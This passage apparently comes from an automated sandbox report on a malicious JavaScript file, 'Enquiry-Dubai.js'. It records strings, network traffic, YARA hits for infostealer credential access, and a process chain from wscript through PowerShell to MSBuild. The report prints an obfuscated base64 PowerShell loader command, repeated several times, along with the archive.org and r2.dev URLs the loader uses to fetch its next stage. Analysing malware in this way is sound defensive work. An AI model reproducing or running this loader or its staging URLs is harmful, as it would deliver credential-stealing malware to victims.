                        Source: MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/07
                        Source: MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE00001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                        Source: MSBuild.exe, 0000000A.00000002.2498769086.0000000006257000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2476202501.0000000001130000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2482251027.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2479036886.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2498769086.0000000006201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600204.us.archive.org
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE0022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia600204.us.archive.org/25/items/new_image_20250318/new_image.jpg
                        Source: powershell.exe, 00000007.00000002.1429331571.000001AE10075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev
                        Source: powershell.exe, 00000007.00000002.1411249717.000001AE01C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pub-6f7fb0d0ae0f40fbad68520fce393d92.r2.dev/223.txt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownHTTPS traffic detected: 207.241.227.224:443 -> 192.168.2.4:49716 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.66.0.235:443 -> 192.168.2.4:49723 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, hxAF.cs.Net Code: Vb7

                        System Summary

                        barindex
                        Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslansh
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFC3C747E207_2_00007FFC3C747E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_02D741F010_2_02D741F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_02D7A63010_2_02D7A630
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_02D74AC010_2_02D74AC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_02D7D89810_2_02D7D898
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_02D73EA810_2_02D73EA8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_068146B810_2_068146B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0681366010_2_06813660
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0681152010_2_06811520
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_06815E4010_2_06815E40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_06819AD110_2_06819AD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0681895010_2_06818950
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0681576010_2_06815760
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_06813DA710_2_06813DA7
                        Source: Enquiry-Dubai.jsInitial sample: Strings found which are bigger than 50
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 10829
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 10829Jump to behavior
                        Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 7.2.powershell.exe.1ae117de740.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 7.2.powershell.exe.1ae113f6e18.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: Process Memory Space: powershell.exe PID: 8188, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, N43UVggPg.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, N43UVggPg.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, Ow96S4wT.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, MjzNdC.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 7.2.powershell.exe.1ae117de740.7.raw.unpack, MjzNdC.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winJS@6/3@5/4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcjk5g0n.p3f.ps1Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Enquiry-Dubai.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslansh
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshacksGIslanshacksaQBrslanshacksGUslanshacksZslanshacksslanshacksgslanshacksC0slanshackscgBlslanshacksHslanshacksslanshacksbslanshacksBhslanshacksGMslanshacksZQslanshacksgslanshacksCcslanshacksIwslanshacksnslanshacksCwslanshacksIslanshacksslanshacksnslanshacksHQslanshacksJwslanshacks7slanshacksCQslanshacksaslanshacksBlslanshacksG4slanshacksYwBoslanshacksGkslanshacksbgBnslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksaslanshacksB0slanshacksHQslanshackscslanshacksBzslanshacksDoslanshacksLwslanshacksvslanshacksGkslanshacksYQslanshacks2slanshacksDslanshacksslanshacksMslanshacksslanshacksyslanshacksDslanshacksslanshacksNslanshacksslanshacksuslanshacksHUslanshackscwslanshacksuslanshacksGEslanshackscgBjslanshacksGgslanshacksaQB2slanshacksGUslanshacksLgBvslanshacksHIslanshacksZwslanshacksvslanshacksDIslanshacksNQslanshacksvslanshacksGkslanshacksdslanshacksBlslanshacksG0slanshackscwslanshacksvslanshacksG4slanshacksZQB3slanshacksF8slanshacksaQBtslanshacksGEslanshacksZwBlslanshacksF8slanshacksMgslanshackswslanshacksDIslanshacksNQslanshackswslanshacksDMslanshacksMQslanshacks4slanshacksC8slanshacksbgBlslanshacksHcslanshacksXwBpslanshacksG0slanshacksYQBnslanshacksGUslanshacksLgBqslanshacksHslanshacksslanshacksZwslanshacksnslanshacksDsslanshacksJslanshacksBwslanshacksGEslanshackscgB0slanshacksGkslanshacksYwBpslanshacksHslanshacksslanshacksYQBuslanshacksGMslanshackseQslanshacksgslanshacksD0slanshacksIslanshacksBOslanshacksGUslanshacksdwslanshackstslanshacksE8slanshacksYgBqslanshacksGUslanshacksYwB0slanshacksCslanshacksslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBOslanshacksGUslanshacksdslanshacksslanshacksuslanshacksFcslanshacksZQBislanshacksEMslanshacksbslanshacksBpslanshacksGUslanshacksbgB0slanshacksDsslanshacksJslanshacksBzslanshJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
